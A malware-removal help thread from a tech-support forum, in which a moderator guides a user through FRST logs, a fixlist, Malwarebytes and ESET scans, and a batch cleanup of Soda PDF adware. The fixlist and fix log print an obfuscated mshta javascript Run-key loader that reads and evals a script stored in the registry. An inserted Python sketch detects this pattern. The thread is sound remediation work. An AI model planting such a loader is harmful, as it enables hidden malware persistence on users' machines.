Error: (08/11/2015 11:14:15 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:14:15 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:14:15 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:14:15 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.


Microsoft Office:
=========================
Error: (08/03/2015 07:43:15 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: firefox.exe39.0.0.5659ae001d0cdaf2253320240C:\Program Files (x86)\Mozilla Firefox\firefox.exea2b0bf1a-39aa-11e5-9c72-705ab677b1a1

Error: (07/29/2015 07:32:10 AM) (Source: ESENT) (EventID: 412) (User: )
Description: taskhost1568WebCacheLocal: C:\Users\Mom\AppData\Local\Microsoft\Windows\WebCache\V01.log-501

Error: (07/29/2015 07:32:10 AM) (Source: ESENT) (EventID: 412) (User: )
Description: taskhost1568WebCacheLocal: C:\Users\Mom\AppData\Local\Microsoft\Windows\WebCache\V01.log-501

Error: (07/26/2015 12:17:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: javaw.exe8.0.31.1354925fd3unknown0.0.0.000000000c00000920125287a119001d0c7943c7d0d46C:\Program Files (x86)\Java\jre1.8.0_31\bin\javaw.exeunknowndb940cb0-3387-11e5-9dfd-705ab677b1a1

Error: (07/06/2015 08:52:56 PM) (Source: MsiInstaller) (EventID: 11721) (User: Savage)
Description: Product: Java 8 Update 31 -- Error 1721. There is a problem with this Windows Installer package. A program required for this install to complete could not be run. Contact your support personnel or package vendor. Action: installexe, location: C:\Windows\Installer\MSIE4C6.tmp, command: INSTALLDIR="C:\Program Files (x86)\Java\jre1.8.0_31\\" REPAIRMODE=1 (NULL)(NULL)(NULL)(NULL)(NULL)

Error: (07/03/2015 09:50:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: uTorrent.exe3.4.3.40298ac801d0b5bc80f1a9c630C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe10c1ae94-21c5-11e5-9def-705ab677b1a1

Error: (06/28/2015 08:00:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: javaw.exe8.0.31.1354925fd3unknown0.0.0.000000000c000008e1500287a148c01d0b1d4a720e9d1C:\Program Files (x86)\Java\jre1.8.0_31\bin\javaw.exeunknownfd26a18f-1dc7-11e5-9af1-705ab677b1a1

Error: (06/28/2015 07:29:50 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Skype.exe7.5.0.102bb401d0b1d02f0a272631C:\Program Files (x86)\Skype\Phone\Skype.exea3dfe66a-1dc3-11e5-9af1-705ab677b1a1

Error: (06/25/2015 07:41:15 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: uTorrent.exe3.4.3.40298b7401d0af6515faa14730C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exeb632200e-1b69-11e5-8632-705ab677b1a1

Error: (06/25/2015 05:45:41 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: thunderbird.exe31.7.0.5605f6401d0af653934218340C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe8832c5c8-1b59-11e5-8632-705ab677b1a1


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i3 CPU M 330 @ 2.13GHz
Percentage of memory in use: 57%
Total physical RAM: 3893.58 MB
Available physical RAM: 1672.33 MB
Total Virtual: 7785.36 MB
Available Virtual: 5082.54 MB

==================== Drives ================================

Drive c: (WINDOWS) (Fixed) (Total:456.62 GB) (Free:357.52 GB) NTFS
Drive d: (Data) (Fixed) (Total:8.75 GB) (Free:1.03 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: C17AE81F)
Partition 1: (Active) - (Size=400 MB) - (Type=27)
Partition 2: (Not Active) - (Size=456.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=8.7 GB) - (Type=07 NTFS)

==================== End of log ============================
kkollage is offline  
Old 08-11-2015, 06:33 PM   #5
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello kkollage. You're welcome. Do you still use Soda PDF 6?

Quote:
I have a 4 disc set of ''product recovery'' - is that the same thing?
No, a repair disc is just one disc. You can always make one later, on any Win7 machine.

------------------------------------------------------
  • Open Notepad (Start > All Programs > Accessories > Notepad).
  • Please copy all the text in the codebox below. (To do this highlight the contents of the box, right-click on it and select Copy. Right-click in the open Notepad and select Paste).
  • Save it as fixlist.txt next to FRST64.exe
  • If asked to change 'Encoding:' to 'Unicode:', please agree and save it.

    NOTE: Both FRST64.exe and the fixlist.txt must be in the same location or the fix will not work.


    Code:
    start
    createrestorepoint:
    FirewallRules: [{5E0C6FF5-AA8A-4452-86E4-8B5C86D10E97}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{694FC7B7-0568-465B-A863-EC1D4891024F}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
    HKU\S-1-5-21-924763536-93737856-2869661127-1000\...\Run: [**ac49aad3<*>] => mshta javascript:YKTfM8a="lesbPHGZt";N3x=new%20ActiveXObject("WScript.Shell");O9uceQw="FoIi";XULc3=N3x.RegRead("HKCU\\software\\89410848\\8f956f6e");YZC3oqT="kX";eval(XULc3);ttz9gHHS="gOskW"; <===== ATTENTION (Value Name with invalid characters)
    ShellIconOverlayIdentifiers: ["DropboxExt1"]         -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt2"]         -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt3"]         -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt4"]         -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt5"]         -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt6"]         -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt7"]         -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File
    ShellIconOverlayIdentifiers: ["DropboxExt8"]         -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => No File
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: Soda PDF 6 -> C:\Program Files (x86)\Soda PDF 6\np-previewer.dll [No File]
    CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
    S1 MpKsl958ccaaf; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\MpKsl958ccaaf.sys [X]
    2015-08-08 21:08 - 2014-05-25 18:32 - 00000000 ____D C:\Users\Mom\AppData\Roaming\uTorrent
    EmptyTemp:
    end
  • Double-click FRST64 to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
  • Click the Fix button just once, and wait.
  • If you receive a message that a reboot is required, please make sure you allow it to restart normally.
  • The tool will complete its run after the restart.
  • When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please post the Fixlog.txt log in your reply.

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
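As an added example (not part of the thread and not FRST's own code), this Python sketch shows how a responder could triage FRST registry lines for the pattern visible in the fixlist above: a Run value that starts mshta with an inline script, which reads a second registry value and passes it to eval. The function names and indicator labels are hypothetical; the first sample line is the one from the log, the other two are constructed.

```python
import re
from urllib.parse import unquote

# FRST registry line: "<key ending in Run/RunOnce>: [<value name>] => <command>"
RUN_LINE = re.compile(
    r'^(?P<key>HK[A-Za-z0-9-]+\\.*?\\(?:RunOnce|Run)): \[(?P<name>.*?)\] => (?P<cmd>.*)$'
)
# mshta (optionally with a path) given an inline script instead of a file
SCRIPT_HOST = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?mshta(?:\.exe)?"?\s+(?P<scheme>javascript|vbscript):', re.I
)
REGREAD = re.compile(r'RegRead\(\s*"([^"]+)"\s*\)', re.I)
EVAL = re.compile(r'\beval\s*\(', re.I)
# Characters a normal autorun value name rarely contains (assumed allow-list)
ODD_NAME = re.compile(r'[^\w .\-()]')

# First line: taken from the log in this thread. Others: constructed benign lines.
SAMPLE = r'''
HKU\S-1-5-21-924763536-93737856-2869661127-1000\...\Run: [**ac49aad3<*>] => mshta javascript:YKTfM8a="lesbPHGZt";N3x=new%20ActiveXObject("WScript.Shell");O9uceQw="FoIi";XULc3=N3x.RegRead("HKCU\\software\\89410848\\8f956f6e");YZC3oqT="kX";eval(XULc3);ttz9gHHS="gOskW"; <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [ExampleUpdater] => "C:\Program Files (x86)\Example\updater.exe" /background
FirewallRules: [{00000000-0000-0000-0000-000000000000}] => (Allow) C:\Program Files\Example\app.exe
'''


def analyze_line(line):
    """Return a finding dict for a Run/RunOnce line, or None for other lines."""
    m = RUN_LINE.match(line.strip())
    if not m:
        return None
    # FRST appends its own remark after " <===== "; keep it apart from the command
    cmd, _, note = m.group('cmd').partition(' <===== ')
    cmd = unquote(cmd)  # the logged command uses %20 for spaces

    indicators = []
    host = SCRIPT_HOST.match(cmd)
    if host:
        indicators.append('mshta-inline-' + host.group('scheme').lower())
    # Registry locations the inline script reads its real body from
    stored = [p.replace('\\\\', '\\') for p in REGREAD.findall(cmd)]
    if stored:
        indicators.append('script-reads-registry')
    if EVAL.search(cmd):
        indicators.append('eval-of-loaded-data')
    if ODD_NAME.search(m.group('name')) or 'invalid characters' in note:
        indicators.append('unusual-value-name')

    return {
        'key': m.group('key'),
        'value_name': m.group('name'),
        'indicators': indicators,
        'stored_script_locations': stored,
        # Inline script host plus load-and-execute behaviour is the signal;
        # an odd value name alone is not treated as sufficient.
        'suspicious': bool(host) and (bool(stored) or 'eval-of-loaded-data' in indicators),
    }


def scan(log_text):
    """Return findings for every suspicious autorun line in an FRST log."""
    findings = []
    for line in log_text.splitlines():
        finding = analyze_line(line)
        if finding and finding['suspicious']:
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE):
        print(f['key'], f['value_name'], f['indicators'])
        for loc in f['stored_script_locations']:
            print('  script body stored at:', loc)
```

The extracted location is the registry value the autorun command loads its script from, so it is worth checking in a follow-up scan once the Run value itself has been removed.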
Old 08-12-2015, 12:51 AM   #6

Hi
I am stuck. I do not understand what this is:
save as fixlist.txt next to FRST64.exe
I followed directions and saved it in downloads. It appears to be near F...64 but not ''with'' it. Do I drag it to F...64 and then run that? (it prompts the window Do you want to allow...etc)
Please advise. I have to go to work now so will check back in about 8 hours.

Thank you very much
kkollage is offline  
Old 08-12-2015, 05:27 AM   #7

Hello again, kkollage. You're welcome. It only needs to be in the same folder as FRST64.exe. Just double-click FRST64.exe and click Fix after it downloads an updated version. Let me know if you still have trouble.
chemist is offline  
Old 08-12-2015, 02:11 PM   #8

Fix result of Farbar Recovery Scan Tool (x64) Version:11-08-2015 02
Ran by Mom (2015-08-12 21:21:09) Run:1
Running from C:\Users\Mom\Downloads
Loaded Profiles: Mom (Available Profiles: Mom)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
createrestorepoint:
FirewallRules: [{5E0C6FF5-AA8A-4452-86E4-8B5C86D10E97}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{694FC7B7-0568-465B-A863-EC1D4891024F}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
HKU\S-1-5-21-924763536-93737856-2869661127-1000\...\Run: [**ac49aad3<*>] => mshta javascript:YKTfM8a="lesbPHGZt";N3x=new%20ActiveXObject("WScript.Shell");O9uceQw="FoIi";XULc3=N3x.RegRead("HKCU\\software\\89410848\\8f956f6e");YZC3oqT="kX";eval(XULc3);ttz9gHHS="gOskW"; <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => No File
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: Soda PDF 6 -> C:\Program Files (x86)\Soda PDF 6\np-previewer.dll [No File]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
S1 MpKsl958ccaaf; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\MpKsl958ccaaf.sys [X]
2015-08-08 21:08 - 2014-05-25 18:32 - 00000000 ____D C:\Users\Mom\AppData\Roaming\uTorrent
EmptyTemp:
end
*****************

Restore point was successfully created.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5E0C6FF5-AA8A-4452-86E4-8B5C86D10E97} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{694FC7B7-0568-465B-A863-EC1D4891024F} => value removed successfully
HKU\S-1-5-21-924763536-93737856-2869661127-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**ac49aad3<*> => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => No File => key not found.
HKCR\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\Soda PDF 6" => key removed successfully
"HKLM\SOFTWARE\Google\Chrome\Extensions\flliilndjeohchalpbbcdekjklbdgfkk" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\flliilndjeohchalpbbcdekjklbdgfkk" => key removed successfully
MpKsl958ccaaf => service removed successfully
C:\Users\Mom\AppData\Roaming\uTorrent => moved successfully.
EmptyTemp: => 2.6 GB temporary data Removed.


The system needed a reboot..

==== End of Fixlog 21:38:40 ====

thank you
kkollage is offline  
Old 08-12-2015, 04:15 PM   #9
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. You're very welcome. How is the machine behaving? Is MSE still detecting the trojan?

Do you use Soda PDF 6?

------------------------------------------------------

Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Double-click mbam-setup-2.1.8.1057.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish
  • At the end of the installation, a database update will be performed.
  • Click on Scan Now
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Remove Selected to allow MBAM to clean what was detected.
  • In most cases, a restart will be required and a prompt will be shown.
  • Wait for the prompt to restart the computer to appear, then click on Yes
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double-click on the Scan Log which shows the Date and Time of the scan just performed.
  • Click Export
  • Click Text file (*.txt)
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named File Saved should appear stating "Your file has been successfully exported".
  • Click Ok
  • Post that saved log in your next reply.
------------------------------------------------------

Your Java is out of date.

Java(TM) 8 Update 31 can be updated from the Java Control Panel. Go Start > Control Panel > Programs > Java (looks like a coffee cup) > Update Tab > Update Now. An update should begin; follow the prompts.

Make sure you untick the box next to whatever free program they prompt you to install, unless you want it. Also, let Java remove older versions if prompted.
  • After the install is complete, go back to your Control Panel and click the Java icon. (looks like a coffee cup)
    • On the General tab, under Temporary Internet Files, click the Settings button.
    • Next, click on the Delete Files button.
    • There are two options checked in the window to clear the cache - Leave BOTH Checked
      • Cached Applications and Applets
      • Trace and Log Files
    • Click OK on Delete Temporary Files Window.
      Note: This deletes ALL the Downloaded Cached Applications and Applets from the CACHE
    • Click OK to leave the Temporary Files Window.
    • Click OK to leave the Java Control Panel.
------------------------------------------------------

Please run this online scan to help look for remnants. Ensure your external and/or USB drives are inserted during the scan.

In Microsoft Windows Vista/Win7, you must open the Web browser via a right-click using the Run as administrator command.

Go here and click 'Run ESET Online Scanner'.
  • If you are not using Internet Explorer, double-click esetsmartinstaller_enu.exe to install it, then click 'Run'.
  • Turn off the real-time scanner of any existing antivirus program while performing the online scan. Here's how
  • Tick the box next to YES, I accept the Terms of Use.
  • Click Start
  • If using Internet Explorer, allow the ActiveX control to install when asked.
  • Once the components have downloaded, tick the option Enable detection of potentially unwanted applications
  • Click on Advanced Settings
  • Make sure that the option Remove found threats is unticked.
  • Ensure these options are ticked:
    • Scan Archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Next to 'Current scan targets: Operating memory, Local drives', click the Change... button.
  • Tick all the boxes that correspond to your external/inserted drives.
  • Click Start
  • Wait for the scan to finish.
  • When the scan is done, if it shows a screen that says "Threats found!", click "List of found threats", and then click "Export to text file..."
  • Save that text file to your desktop, and then copy/paste the contents in your next reply.
------------------------------------------------------

Please post the following in your next reply:

MBAM log
ESET report
report on system behavior
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 08-13-2015, 11:00 AM   #10
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hi chemist

I was able to get the MBAM log.
I got up to "Go here and run ESET Online Scanner", got the link and checked the agree box, but then I cannot run ESET Online Scanner. (I have a screenshot but fail to get it to print here.) The message is "an add on for this failed to run" and then I get a blank blue screen. No ActiveX or anything...

I await your advice. Thanks.
Attached Thumbnails
Name: ESET message.jpg
kkollage is offline  
Old 08-13-2015, 01:28 PM   #11
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. Use Firefox for the ESET scan, and download and run the esetsmartinstaller_enu.exe.

------------------------------------------------------
chemist is offline  
Old 08-14-2015, 02:23 AM   #12
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hi chemist

Thanks, I have the scan results now. My son was kind enough to quickly create my tech forum account and send the first mail to you before he left on holiday. My IT skills are basic and I appreciate your help. The Soda 6 came up as 2 of 3 threats, so there's our answer on that (I did not know I was using it). I have been using my son's laptop since beginning this clean up and so I cannot report on how this one is running just yet. Here are the results:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 13/08/2015
Scan Time: 08:58
Logfile: malware report.txt
Administrator: Yes

Version: 2.1.8.1057
Malware Database: v2015.08.13.02
Rootkit Database: v2015.08.06.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Mom

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 350267
Time Elapsed: 31 min, 43 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

C:\ProgramData\Soda PDF 6\Installation\adawareTb_3.4.0.3_Lav01.exe a variant of Win32/Toolbar.Visicom.A potentially unwanted application
C:\Users\All Users\Soda PDF 6\Installation\adawareTb_3.4.0.3_Lav01.exe a variant of Win32/Toolbar.Visicom.A potentially unwanted application
C:\Users\Mom\Downloads\uTorrent.exe a variant of Win32/OpenCandy.C potentially unsafe application

I await your instructions. Thank you.
kkollage is offline  
Old 08-14-2015, 02:29 AM   #13
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Ah - one thing I do notice is that whenever I shut down, Windows tells me not to shut down, loading 1 of 1 updates. This has been going on with every shutdown for a while (could it be part of the problem?). Thanks.
kkollage is offline  
Old 08-14-2015, 09:55 AM   #14
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Also, no trojan detected in the quick scan now. :)
kkollage is offline  
Old 08-14-2015, 10:39 AM   #15
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. You're very welcome. Glad to hear it.

Use the machine as normal for another day or so and let me know how it behaves.

I don't think the update problem is related to the infection you had.

Go to Windows Update > View update history and see what KB is the problem.

------------------------------------------------------

In order to uninstall Soda PDF 6, do the following:

Press the Windows "logo" key and "R" key then copy/paste the following single-line command into the Run box and click OK:

sc delete "LULU Software CrashHandler"

A DOS window will open and close again; this is normal.

Repeat for this command:

sc delete "Soda PDF 6"

------------------------------------------------------

Press the Windows "logo" key and "R" key then copy/paste the following single-line command into the Run box and click OK:

MsiExec.exe /I{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}

Follow the prompts to uninstall Soda PDF 6. If successful...

Open Notepad and copy/paste the entire contents of the codebox below into Notepad:

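Code:
@echo off
rem Clear any log left over from a previous run.
if exist "%temp%\log.txt" del "%temp%\log.txt"

rem Delete the flagged installer; log it if it is still present afterwards.
for %%g in (

"C:\Users\Mom\Downloads\uTorrent.exe"

) do (
del /a/f/q %%g >nul 2>&1
if exist %%g echo.%%~g>>"%temp%\log.txt"
)

rem Remove the leftover Soda PDF 6 folders; log any that could not be removed.
for %%g in (

"C:\ProgramData\Soda PDF 6"
"C:\Users\All Users\Soda PDF 6"
"C:\Program Files (x86)\Soda PDF 6"

) do (
rd /s/q %%g >nul 2>&1
if exist %%g echo.%%~g>>"%temp%\log.txt"
)

rem Open the list of items that could not be deleted, or report success.
if exist "%temp%\log.txt" ( start notepad "%temp%\log.txt"
) else echo.Deleted Successfully !!

pause
rem The script deletes itself once it has finished.
del %0

Save this Notepad file as fix.bat and choose to Save as type: - All Files to your desktop then close the Notepad file.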
It should look like this:

Right-click on fix.bat and choose 'Run as administrator' to allow it to run.

Tell me what it says in your next reply. Press any key to continue.

------------------------------------------------------
chemist is offline  
Old 08-14-2015, 12:55 PM   #16
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Can you please tell me how to install MsiExec.exe /I{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}?

Thanks
kkollage is offline  
Old 08-14-2015, 01:16 PM   #17
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



It is nice to learn where to look around the computer. I see in Windows updates 2 programs fail to load, hence the retries at shut-down. They are as follows:

Update for Microsoft Office 2010 (KB2553347) 32-Bit Edition

Installation date: 14/08/2015 20:56

Installation status: Failed

Error details: Code 80070663

Update type: Important

Microsoft has released an update for Microsoft Office 2010 32-Bit Edition. This update provides the latest fixes to Microsoft Office 2010 32-Bit Edition. Additionally, this update contains stability and performance improvements.

More information:
https://support.microsoft.com/kb/2553347

Help and Support:
https://support.microsoft.com/?LN=en-us

and

Upgrade to Windows 10 Pro

Installation date: 14/08/2015 20:53

Installation status: Failed

Error details: Code 80240020

Update type: Important

Install the next version of Windows.

More information:
Before you install Windows Insider Preview - Microsoft Windows

Help and Support:
https://go.microsoft.com/fwlink/?LinkId=507417

What are your views on this?

Thank you.
kkollage is offline  
Old 08-14-2015, 05:47 PM   #18
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. You're very welcome.

You're not installing MsiExec.exe /I{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}

We're using that command to start the uninstall wizard for Soda PDF 6.

Again, press the Windows "logo" key and "R" key then copy/paste the following bolded command into the Run box and click OK:

